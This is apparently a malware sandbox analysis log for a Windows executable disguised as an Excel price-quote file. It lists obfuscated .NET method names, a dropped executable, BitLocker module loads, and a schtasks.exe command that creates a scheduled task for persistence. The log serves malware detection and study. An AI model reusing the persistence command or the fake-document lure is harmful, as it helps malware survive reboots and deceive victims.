Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, oGQm8v3wF9JwNXXwVH.cs	High entropy of concatenated method names: 'SrZ5XE6Tc5', 'wTX5jTDwuF', 'jap5ILpo1Y', 'g7K5dho5Oh', 'XPE52Kenno', 'ugi5TBgvZ4', 'O7V5hYOpJb', 'T9ftEp89NG', 'GPmtSWNIel', 'u4bt0TceYG'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, nUhYvTMom9nagO8Sow.cs	High entropy of concatenated method names: 'o3MX74Mq04', 'uObXReINPD', 'dXTXfBGNYn', 'xPMX6BS3ud', 'u9mXp77NRW', 'KKxXlgLjdq', 'j84tDXVZHiSXNklwPH', 'cBkG1pzyl2MZiLtvHX', 'W0PXXS3Axk', 'UINXj94KpN'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, fb6yvpsy14g5qhnfk0.cs	High entropy of concatenated method names: 'p4hGfKv758', 'CSCG6OxAhe', 'ToString', 'NiEGd2m8Vr', 'ydAG2e4I7P', 'VQbGPg5Jcw', 'O74GTnf35m', 'iw1GhaxxaK', 'l7bG7BXmHP', 'LYPGRrujTx'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, rtPNF2YwxlfdEVDxrl.cs	High entropy of concatenated method names: 'GAN7dExPKi', 'b307PMPUe1', 'k637hhNEMx', 'RwwhBW4Syn', 'KtmhzQSyVO', 'OBH74sqFhx', 'etn7XDI063', 'PgB7LGlfE1', 'TqX7jA5oby', 'TUQ7I4CfOi'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, W5VmDo6HmpAgbNZEiu.cs	High entropy of concatenated method names: 'SUUPeJkw3p', 'CKHPvmlX49', 'riCPgHNqd6', 'PpKP9pyFXx', 'CxkPpyhMR7', 'sBKPlFMr86', 'TUtPGycVFG', 'nv6PtOU4vp', 'YLUP5E0whf', 'yXEPZfDNTF'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, QgUVtmLMw8PpFR9upN.cs	High entropy of concatenated method names: 'JuyjqubICF', 'adGjdiT4VG', 'G1Lj2rg7J9', 'lFdjPqgoqu', 'APKjT2sUI9', 'a8AjhjZblb', 'gfIj73SfM2', 'VJMjRZG6is', 'DI3jwg3pOC', 'eqcjfcB2V2'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, mJTKhIVc7qJwtjTabI.cs	High entropy of concatenated method names: 'cTZ7J7cYNC', 'aDc7bubEX6', 'Gch7rof9kI', 'lXE7eJhLQ3', 'ImL7nb3ykE', 'r227vpCqua', 'X157D4IK4V', 'MCF7gwnQHe', 'XI679DETYL', 'fKZ7cqDSWp'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, FcY9ehqsfh4aVO4DAb.cs	High entropy of concatenated method names: 'D2q28UTrCE', 'Y2B2O1qNAl', 'UsS2aZpC1K', 'vLW2mjcXTs', 'CcM2QesN39', 'Hyi21AZKxl', 'CYk2Erijq4', 'vHf2SZEyva', 'q7F20ALLfy', 'uiZ2BWXMey'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, NfalMhJ8uA3kaHXvgn.cs	High entropy of concatenated method names: 'ToString', 'tdglMUaySS', 'BMclAsdFte', 'hYZlsxPYEP', 'MK1lkJ0diI', 'dCElo5YxH6', 'JQvl3uxecR', 'PrjlK7yYaC', 'k5TliNlb7R', 'QNRlyNnBHo'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, IjoMYfSa29sGRgq0j8.cs	High entropy of concatenated method names: 'vQWr8baQZ', 'Ccae7WApT', 'aVDv3Qkmf', 'aKGDdS7qC', 'Gbm9dAnY8', 'UHGciHeww', 'rtrMBYy51Dp9VwCUMs', 'Cv2kP3WWM0GKyRy3ht', 'z1Lt2Rrlf', 'NgAZ1LGLD'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, x64ZxoKhudRg3sF6Kl.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wOtL0N3Xg9', 'hH5LBRHur0', 'rd1LzlS6QM', 'iobj4TwJRY', 'DrrjXiHUKv', 'bHmjLl2JHQ', 'yMEjjykn2a', 'wQ5Z4AFKj0x1Du6XXWu'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, lq3FlorROTtpd8nMyY.cs	High entropy of concatenated method names: 'q9ZGSivXxZ', 'CK3GBVQrlu', 'mM5t4fJl6W', 'SsatXaa4E4', 'RLOGMNoVjD', 'NmyGUDJQmN', 'wppGYupSnp', 'lKOG8FVJIn', 'WYBGOsIjVA', 'nb8GaMKfFy'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, j7LYTtwUmq2kSe3mU3.cs	High entropy of concatenated method names: 'YbGtWNOd1L', 'FLKtAXxfNV', 'NvktsgnmsX', 'zPrtkVv3rI', 'PULt85cSZV', 'C6AtorPdhg', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, ns7of4m4T22kQcU5Nm.cs	High entropy of concatenated method names: 'h0vTnik92O', 'CobTDtYk7S', 'T3YPsN1Bxi', 'oF1Pk8jW5X', 'Tw7Poq0ahL', 'SfwP3Np9tC', 'qZ0PKsuXGC', 'BKPPiCe7sB', 'V8hPytjm7x', 'OcjPFSVP1s'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, jO0gAth6LXQ4IqyJvc.cs	High entropy of concatenated method names: 'ztttdiG5AS', 'LpBt2Yvjvf', 'VKWtPm63Y6', 'khTtT9NcrD', 'TOAthuxFga', 'dUwt7S8BQe', 'dvKtR1d9M2', 'd8PtwQUkxy', 'EVZtfKRsy1', 'U7Lt6TFfu7'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, vqNN8YFCFfqQL6aBZ5H.cs	High entropy of concatenated method names: 'fav5JYFKUS', 'ono5bGF0xe', 'VH35rojooI', 'wss5eusTYN', 'bya5nAEG2Q', 'oLj5vGitbF', 'U5m5DdO3x0', 'SY85gBt50M', 'R3l591KDxO', 'GkI5cwHJe7'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, zCNwJdFnQu4puUFchct.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dgbZ8cEKSB', 'zQ7ZO1706m', 'FY3Za5nCXY', 'IE3ZmF4FH5', 'kAiZQysu7M', 'YNIZ1BLPUI', 'wOGZEHPB8g'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, n6TEH8zCDlVl4HvvYO.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ih45NxkWDW', 'FP85psnaKW', 'AFc5lXeqND', 'elM5GeU4di', 'fPs5ttS2Ho', 'qqA55H9qyC', 'u9r5ZCPuaQ'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, rC3oiK5rTtspMSI9J1.cs	High entropy of concatenated method names: 'GbmhqLAXWQ', 'w4wh2ynJYM', 'hJFhT6AaXb', 'Rg1h7G0OA5', 'uHchRdmBID', 'I38TQIqQkZ', 'nBgT1pdIWE', 'SUNTEukURZ', 'lTETS1axwi', 'a27T00VZeI'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, kG4rDQDRSR9x8fka51.cs	High entropy of concatenated method names: 'Dispose', 'yWdX0a3wNK', 'AQ4LArR3fh', 'K1XxxJ42gs', 'wZ6XBNWLdj', 'OZcXzQ9FkL', 'ProcessDialogKey', 'xf6L4XVVO1', 'IF6LXbwoBN', 'fOWLLYVOFa'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, zOP9a9BGA3on5uXvvo.cs	High entropy of concatenated method names: 'mZkNgowxlj', 'UlFN9ov2pV', 'JXuNWWn3fw', 'fZvNAi3n7c', 'E4ZNkSpyP8', 'UTkNonhXMH', 'YqJNKgtGv4', 's1uNiPwjJv', 'K5gNFqPYE4', 'IkBNMrxgyM'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, oGQm8v3wF9JwNXXwVH.cs	High entropy of concatenated method names: 'SrZ5XE6Tc5', 'wTX5jTDwuF', 'jap5ILpo1Y', 'g7K5dho5Oh', 'XPE52Kenno', 'ugi5TBgvZ4', 'O7V5hYOpJb', 'T9ftEp89NG', 'GPmtSWNIel', 'u4bt0TceYG'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, nUhYvTMom9nagO8Sow.cs	High entropy of concatenated method names: 'o3MX74Mq04', 'uObXReINPD', 'dXTXfBGNYn', 'xPMX6BS3ud', 'u9mXp77NRW', 'KKxXlgLjdq', 'j84tDXVZHiSXNklwPH', 'cBkG1pzyl2MZiLtvHX', 'W0PXXS3Axk', 'UINXj94KpN'

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

File created: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
